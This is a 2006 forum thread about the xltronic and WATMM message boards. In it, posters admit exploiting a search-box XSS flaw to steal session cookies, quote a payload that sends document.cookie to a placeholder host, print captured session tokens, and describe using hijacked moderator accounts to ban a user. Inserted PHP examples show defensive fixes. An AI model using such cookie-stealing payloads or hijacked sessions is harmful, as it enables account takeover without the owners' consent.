|
|
JAroen
from the pineal gland on 2006-12-04 14:44 [#02012630]
Points: 16065 Status: Regular
|
|
it was easier to ddos joyrex' place than it was to crash xlt. so there.
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-04 14:51 [#02012633]
Points: 26326 Status: Lurker | Followup to JAroen: #02012630
|
|
I used to do it by visiting the forum.
|
|
Phobiazero
from the next Xltronic (Sweden) on 2006-12-04 15:01 [#02012645]
Points: 10507 Status: Webmaster | Followup to giginger: #02012633
|
|
nice banner, giginger! :)
|
|
DiaZoHeXagoN
from The city of angels (United States) on 2006-12-04 15:34 [#02012659]
Points: 2659 Status: Lurker | Followup to roygbivcore: #02012621
|
|
I was wondering where he went, I always liked him and his music. anyone care to explain what happened, or is this not a good thing to discuss? Sorry no disrespect, I'm just curious where panda went...
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-04 16:42 [#02012684]
Points: 26326 Status: Lurker | Followup to Phobiazero: #02012645
|
|
I feel it oozes Web2.0
|
|
Drunken Mastah
from OPPERKLASSESVIN!!! (Norway) on 2006-12-04 16:43 [#02012688]
Points: 35867 Status: Lurker | Followup to giginger: #02012684
|
|
is it that css effect thingie? I remember some site you linked once...
|
|
Phobiazero
from the next Xltronic (Sweden) on 2006-12-04 16:50 [#02012697]
Points: 10507 Status: Webmaster
|
|
hehe..... well, at least we're gonna try to avoid all the fun
and hyped up 2.0-ish colorschemes (green, pink, blue etc)
|
|
stefano_azevedo
from Pindorama (Brazil) on 2006-12-04 16:54 [#02012701]
Points: 4396 Status: Regular
|
|
watmm makes my eyes hurt
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-04 17:03 [#02012725]
Points: 26326 Status: Lurker | Followup to Drunken Mastah: #02012688
|
|
That site is gone or else I'd have used that. Would've looked nicer too.
|
|
Chin Bwoy Phat
from London (United Kingdom) on 2006-12-05 05:05 [#02012889]
Points: 574 Status: Lurker
|
|
watmm is lovely. xlt is lovely. can't we just all get along?
p.s. fuck off
|
|
obara
from Utrecht on 2006-12-05 05:09 [#02012891]
Points: 19377 Status: Regular
|
|
stop this thread please
|
|
Rostasky
from United States on 2006-12-05 06:03 [#02012897]
Points: 1572 Status: Lurker
|
|
They don't have very creative avatars is all I'm gonna say.
|
|
Chin Bwoy Phat
from London (United Kingdom) on 2006-12-05 06:05 [#02012898]
Points: 574 Status: Lurker
|
|
you referring to mine? yes, it's rubbish. i thank you....
|
|
xceque
on 2006-12-05 06:18 [#02012900]
Points: 5888 Status: Moderator
|
|
The xlt vs watmm debate:
|
| Attached picture |
|
|
|
hma
from real life on 2006-12-05 06:20 [#02012901]
Points: 528 Status: Lurker
|
|
keep in mind, you do have at least one major security hole, the XSS on your search function. In fact, as I post this, I am not actually HMA but someone else using a proxy server. Check my ip address, I'm sure it can be done. I also have valid sessionID as horsefactory. I used to have a valid login for you, Phobiazero, but either recently you logged out and logged back in, invalidating your cookies, or you figured out I was logged in as you every day for the past 2 weeks or so. In any case, what I did was as follows.
in the search box if you put a "> you can add html after that, so I injected javascript to point to some freewebspace as so:
"http://nonexistantwebsitethatdoesntexist.com/folder/evilphp.php?cookies=" . document.cookie;, and then posting the link that said "hey, there's something wrong with your search function.". The first time I did this with my actual ulcresh login, and 2 people followed the link, HMA and Horsefactory, and a couple guests.
There was this whole little thing with Dog_Belch, who by being a dick was actually more intelligent than some others. I used the HMA account to repost a similar hacked link a couple weeks later. 1 non-guest clicked it. Phobiazero. It was very fun to see all the moderator buttons. They seem very underpowered to be honest and I agree with the assessment that you need to improve them.
However, requiring typing the password to change the profile is very secure, good job on that.
Here are the full log files (edited to keep the important info and remove guests):
(this is hma)
Opera/8.54 (Windows NT 5.1; U; en) --- (this is my ULCRESH login, yes, that's right, I just gave ANYONE the ability to log in as ULCRESH)
AFX_NU_SESSION=
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
--- (horsefactory)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1) Gecko/20061010 Firefox/2.0
stupid post character limit. FIX THAT.
|
|
DirtyPriest
from Copenhagen (Denmark) on 2006-12-05 06:23 [#02012902]
Points: 5499 Status: Lurker | Followup to hma: #02012901
|
|
You should probably mail that, instead of posting it
|
|
horsefactory
from 💠 (United Kingdom) on 2006-12-05 06:24 [#02012903]
Points: 14867 Status: Regular
|
|
anyway, to continue my post as horsefactory:
-------------------
(this is phobiazero) his cookies that are no longer valid:
__utma=96777942.1310899365.1164665989.1164835731.1164871283.13; APHEXTWIN_MBOARD_ORDERCHOICE=DESC; __utmz=96777942.1164665989.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); AFX_NU_SESSION=b61bc043e54f32bd954f3df2a6e8e687.1; __utmb=96777942; __utmc=96777942
219.65.132.1 Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.1) Gecko/20061010 Firefox/2.0
You really should fix that. I was gonna log in as Phobiazero and make an "I love WATMM and XLTV2 is vaporware" post, but I was no longer able to.
this is unfortunate.
if you're going to write web applications, KNOW something about security, especially since this runs on PHP v3.
Read up on XSS, SQL Injection, RFI, etc.
|
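The two defences that apply to the search-box XSS and cookie theft described in the posts above, as an added example that is not part of the original thread and not the forum's own code: encode the search term when it is echoed into the form, and mark the session cookie HttpOnly. The function names and the `/search` path are assumptions; the array form of `session_set_cookie_params()` needs PHP 7.3 or later.

```php
<?php
declare(strict_types=1);

// Added example, not the forum's code. Names such as render_search_form()
// and the /search path are assumptions made for illustration.

// Encode a value for HTML text or a quoted attribute.
// ENT_QUOTES encodes " and ', so the value cannot close the attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 rather than returning ''.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The search term is echoed back into the value attribute, which is the
// position the post describes closing with "> before adding markup.
function render_search_form(string $term): string
{
    return '<form action="/search" method="get">'
         . '<input type="text" name="q" value="' . h($term) . '">'
         . '<input type="submit" value="Search">'
         . '</form>';
}

// Flags for the session cookie. HttpOnly keeps it out of document.cookie,
// so script running in the page cannot read the session id.
function session_cookie_options(bool $https): array
{
    return [
        'lifetime' => 0,        // expires when the browser closes
        'path'     => '/',
        'secure'   => $https,   // only sent over HTTPS when available
        'httponly' => true,
        'samesite' => 'Lax',
    ];
}

if (PHP_SAPI === 'cli') {
    // Constructed input: attribute-closing characters plus harmless markup.
    $html = render_search_form('"><b>test</b>');
    echo $html, PHP_EOL;
    // The only raw '<' characters left belong to the form's own tags.
    var_dump(strpos($html, '<b>') === false);
} else {
    // In the web application, set the flags before starting the session.
    session_set_cookie_params(session_cookie_options(!empty($_SERVER['HTTPS'])));
    session_start();
    $q = $_GET['q'] ?? '';
    echo render_search_form(is_string($q) ? $q : '');
}
```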
|
horsefactory
from 💠 (United Kingdom) on 2006-12-05 06:26 [#02012905]
Points: 14867 Status: Regular
|
|
ps, why can't moderators see people's IP addresses and user agents, stuff like that is useful.
|
|
horsefactory
from 💠 (United Kingdom) on 2006-12-05 06:31 [#02012906]
Points: 14867 Status: Regular
|
|
also, I did 4 things with these logins: 1) delete my HMA post which Phobiazero had clicked on. 2) I accidentally posted as horsefactory a while back, because I thought I was ULCRESH, he posted right after that saying "I did not post that"
3) I banned some random person that hasn't logged in for several months, just to try it out.
4) I closed some thread, just to try it out.
I think that was it. I could've theoretically banned all of your moderators.
|
|
xceque
on 2006-12-05 06:34 [#02012909]
Points: 5888 Status: Moderator | Followup to horsefactory: #02012906
|
|
Lovely. Thanks for not doing that.
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 06:34 [#02012910]
Points: 26326 Status: Lurker
|
|
Well, that's certainly amusing.
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 06:40 [#02012912]
Points: 26326 Status: Lurker
|
|
In other news. Zilty has taken to looking like this at work. Despite hard refreshing and clearing of cache.
Pic
|
|
xceque
on 2006-12-05 06:44 [#02012913]
Points: 5888 Status: Moderator | Followup to giginger: #02012912
|
|
"Newest message first!"
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 06:45 [#02012914]
Points: 26326 Status: Lurker | Followup to xceque: #02012913
|
|
Hell yes. For some reason that works for me on Zilty.
|
|
xceque
on 2006-12-05 06:48 [#02012916]
Points: 5888 Status: Moderator | Followup to giginger: #02012914
|
|
That's like, such a totally rad and awesome concept, dude. I can't get my head around the paradigm shift. Dude!
|
|
redrum
from the allman brothers band (Ireland) on 2006-12-05 06:51 [#02012918]
Points: 12878 Status: Addict | Followup to horsefactory: #02012903
|
|
haha :)
good stuff and well written.
|
|
furoi
from Udine (Eriko Sato's undies) (Italy) on 2006-12-05 06:54 [#02012921]
Points: 1706 Status: Lurker
|
|
it's because of my profile infos
Namastè
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 07:01 [#02012923]
Points: 26326 Status: Lurker | Followup to xceque: #02012916
|
|
Gnarly!
|
|
chaosmachine
from Ottawa (Canada) on 2006-12-05 07:59 [#02012945]
Points: 2330 Status: Lurker
|
|
nice xss..
so why aren't sessions validated against ip addresses?.. if the ip has changed since the session was created, you should be required to log back in..
|
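The check proposed in the post above, tying a session to the address it was created from and forcing a new login when that address changes, as an added example that is not part of the original thread and not the forum's own code. A plain array stands in for `$_SESSION`, and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the forum's code. The array stands in for $_SESSION and
// the function names are assumptions made for illustration.

// Call at login: remember which address the session was created from.
function bind_session(array &$session, string $userId, string $clientIp): void
{
    // In a web request, also call session_regenerate_id(true) here so the
    // pre-login session id is not carried over.
    $session = ['user_id' => $userId, 'bound_ip' => $clientIp];
}

// Call on every request. Returns the user id, or null when the visitor
// must log in again (no session, or the address no longer matches).
function authenticated_user(array &$session, string $clientIp): ?string
{
    if (!isset($session['user_id'], $session['bound_ip'])) {
        return null;
    }
    if (!hash_equals($session['bound_ip'], $clientIp)) {
        $session = [];   // discard the session rather than trusting the cookie
        return null;
    }
    return $session['user_id'];
}

if (PHP_SAPI === 'cli') {
    // Constructed addresses from the documentation ranges (RFC 5737).
    $session = [];
    bind_session($session, 'moderator', '192.0.2.10');
    var_dump(authenticated_user($session, '192.0.2.10'));   // same address
    var_dump(authenticated_user($session, '198.51.100.7')); // copied cookie, other address
    var_dump(authenticated_user($session, '192.0.2.10'));   // session was dropped
}
```

In a web request the call would be `authenticated_user($_SESSION, $_SERVER['REMOTE_ADDR'])`. Visitors whose address changes mid-session, for example on mobile networks or rotating proxies, are asked to log in again, and behind a reverse proxy `REMOTE_ADDR` is the proxy's address rather than the visitor's.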
|
elusive
from detroit (United States) on 2006-12-05 09:06 [#02012977]
Points: 18368 Status: Lurker
|
|
good stuff here :)
and phob, keep this board minimal. i don't want stupid-emoticons, edit buttons, quote buttons, sup buttons, howdy buttons, howru buttons,
or anything else . most sites are so damn bloated these days :(
|
|
Phobiazero
from the next Xltronic (Sweden) on 2006-12-05 09:57 [#02012987]
Points: 10507 Status: Webmaster
|
|
ah yeah, the beta-search... we've added some protection for that now.
as for ip <-> sessions....... xltv2. i'm sure ppl are prepared to sacrifice some laziness in order to get some tighter security.
as for ULCRESH: feel free to contact me per email/icq/aim for some further discussions/cooperation. i appreciate your efforts in finding out the bug. we're not using php3 tho... :)
|
|
oyvinto
on 2006-12-05 10:38 [#02013007]
Points: 8197 Status: Lurker | Followup to Phobiazero: #02012481
|
|
good to hear that you won't go commercial with the forum phobs. the custom mb as xlt is, is one of the few reasons i like it here.
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:38 [#02013042]
Points: 1389 Status: Lurker | Followup to hma: #02012901
|
|
PWN
|
|
giginger
from Milky Beans (United Kingdom) on 2006-12-05 11:42 [#02013043]
Points: 26326 Status: Lurker | Followup to Joyrex: #02013042
|
|
Of course there's never been any hacks for the Invision Power Board.
|
|
chaosmachine
from Ottawa (Canada) on 2006-12-05 11:44 [#02013044]
Points: 2330 Status: Lurker
|
|
lol..
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:48 [#02013049]
Points: 1389 Status: Lurker | Followup to Phobiazero: #02012481
|
|
Let's see if I can follow up to your broken English reply (if there was a proper quote feature I could use that, but oh well... also, I had to do this in two posts since you have a post limit "feature" in place...)
sorry to disappoint you, joyrex...
[You haven't - I was just making an observation/suggestion you took way too seriously]
i believe in our concept/forum just as hard as you believe in mainstream and commercial forums...
[That's great - no problem there]
to be honest, i feel sick everytime i see a forum from "one-of-the-three-messageboard-companies". it's prolly the scandinavian, minimalistic side of me.
[I agree with you on that - most out of the box forums tend to go overboard on features, but most of them allow you to turn things off as they are not needed. So, if I wished, I could make our forum follow a direct, minimalist edict. I actually tried using the forums that came built into the CMS I use for WATMM, but most users missed those features they had gotten used to with the prior forum, so we went back. I see this here occasionally when people ask for common forum features that this one doesn't have. You then have to make the choice of making the majority happy, or stick to your guns and ignore user needs. Hard choice, IMO.
but to nail the issue.... we can add a myriads of features and functions, but we choose to implement only stuff that makes sense.
[As you should... no argument there]
do you really think the lack of an edit-button is a technical
issue due to our "custom" system?
[No, of course not - I just find it odd that a basic feature like editing is still not implemented. I wonder how many posts are followups to what could have been corrected with an edit feature.]
no. i've dismissed the idea of having an edit-feature just as long you've known html - due to various reasons (use the search-feature to find my previous rantings on this).
[Understood - just I think something as basic as editing would be worth considering, even if limite
|
|
Drunken Mastah
from OPPERKLASSESVIN!!! (Norway) on 2006-12-05 11:50 [#02013051]
Points: 35867 Status: Lurker | Followup to Joyrex: #02013049
|
|
jeg skal pakke deg inn i bobleplast og pule morra di skal jeg
|
|
horsefactory
from 💠 (United Kingdom) on 2006-12-05 11:50 [#02013052]
Points: 14867 Status: Regular
|
|
haha, wow
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:55 [#02013053]
Points: 1389 Status: Lurker
|
|
d in time (like on our forums).]
as for better tools for the admins, yeah... xltv2 will take care of that. we removed some of the admin-tools due to the infamous Virginpusher-scandal a couple of months ago. imagine a mod on drugs, feeling hatress against his webmaster, and at the same time having the power of deleting
entire threads with a single click! well, we just thought we
would disable these features for a while. it's not like we don't trust our current team of mods, but xltv2 is having a more enhanced set of admin-tools.
[See, there you go - if one of my mods were to go apeshit, I could just disable his or her account, rather than cripple my other mods. That's really more a matter of choosing people you can trust, though.]
was that one of the issues with our custom software, joyrex?
i've personally seen ALOT more complains towards your forum than against xltronic/mb (maybe because i hardly visit watmm).
[You're right - in fact, I can't recall the last time I got a complaint about the forum itself]
(slow, ugly, clumsy, unstable and what's more...) but at least you can EDIT messages - HELL YEAH! :)
[That's a bit immature (but expected) - the forum is not slow, ugly is only due to my lack of taking the time to customize the look, and clumsy is a matter of opinion, really - the majority of forum users have no problem with the interface, and it was developed with a larger testbed of users than XLT will ever have, FYI]. Unstable is totally off-base considering many large companies put lots of money behind using these forums - they simply wouldn't if that was the case, and we can do a LOT more than just edit.]
actually, i don't understand why you're still spreading your
annoying, commercial pep-talk here after all these years...
[Just a friendly suggestion/observation - and it's not like I do this all the time]
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:57 [#02013054]
Points: 1389 Status: Lurker
|
|
why don't you try to get some distance to your own "mess" over there? you don't have to answer that btw - i know it's like a nail in the eye. believe me.
[Not really - and since I can't understand your meaning there (I don't fault you for English not being your native language), I really can't say much other than I tend to be more helpful to others than myself - a bit of a failing on my part, really...]
well, time will tell...
[It always does, Mattias, it always does :) ]
|
|
Joyrex
from watmm.com (United States) on 2006-12-05 11:59 [#02013057]
Points: 1389 Status: Lurker | Followup to Drunken Mastah: #02013051
|
|
That would be nice if I knew what it said, but I don't pretend to know Swedish.
|
|
Sclah
from Freudian Slipmat on 2006-12-05 12:06 [#02013059]
Points: 3121 Status: Lurker
|
|
He wants to purchase bubblewrap and congratulate your mother
|
|
xceque
on 2006-12-05 12:23 [#02013067]
Points: 5888 Status: Moderator
|
|
Once more...
|
| Attached picture |
|
|
|
ToXikFB
on 2006-12-05 12:23 [#02013068]
Points: 4414 Status: Lurker | Followup to Joyrex: #02013053
|
|
LAZY_TITLE
|
|
vlari
from beyond the valley of the LOLs on 2006-12-05 12:28 [#02013072]
Points: 13915 Status: Regular
|
|
please dont hack my account i post enough rubbish as it is
|
|
dave_g
from United Kingdom on 2006-12-05 13:10 [#02013084]
Points: 3372 Status: Lurker
|
|
Edit features are rubbish. The fact that people have to post a follow up maintains a chronological relationship in the thread, which is easy to follow.
I dislike the design of message boards which have multiple separate sub forums, it's too divergent.
For example, I want to scan down for a topic from yesterday. I can't search for it because I cannot remember what it was (this is hypothetical), however I will recognise it when I see it.
On a single forum, I scroll down from the latest post until the posts from yesterday, and I will see it.
On a multi sub forum one, I potentially have to do that on all the forums.
Also unless you look at each forum, you could miss a good topic, whereas on here, it is pretty obvious because it's all on one page.
The whole look of watmm is cluttered imo. Too many buttons, too many signatures, images on the end of EVERY post by a user and general crap. I use the mouse wheel and my eye to judge the scroll per content amount, and I think xlt wins.
- - -
Although there may be bugs, one has to commend Phobia and Tune on the fine job done on this site. Perhaps it is idiosyncratic, but it's how they want it. If it's so bad, surely people won't come and it will die out? (natural selection et al).
Joyrex: I think it's quite counter productive and a bit petty to come on here and troll around.
"(stand with arms outstretched, awaiting XLT firing squad)"
surely that is not how you end a productive post? I know there is history, but perhaps keep quiet or say to Phob you're sorry people are abusing the board, and perhaps show some empathy, I'm sure people have abused watmm and I bet you didn't like it.
Anyway, life is too short, less hate, more love.....
|
|
w M w
from London (United Kingdom) on 2006-12-05 13:21 [#02013089]
Points: 21452 Status: Lurker
|
|
I would have paid $200 for that information if nobody else knew still. I would have sold it to sneakattack for $400, and xltronic as we know it would be no more, muah ha ha ha.
|
|
stefano_azevedo
from Pindorama (Brazil) on 2006-12-05 13:30 [#02013091]
Points: 4396 Status: Regular
|
|
ugly is only due to my lack of taking the time to customize the look, and clumsy is a matter of opinion, really - the majority of forum users have no problem with the interface, and it was developed with a larger testbed of
users than XLT will ever have, FYI
|
| Attached picture |
|
|
|
stefano_azevedo
from Pindorama (Brazil) on 2006-12-05 13:31 [#02013092]
Points: 4396 Status: Regular
|
|
if there was a proper quote feature I could use that, but oh well...
|
|
elusive
from detroit (United States) on 2006-12-05 13:54 [#02013102]
Points: 18368 Status: Lurker
|
|
there is an edit button it's called PREVIEW
|
|
|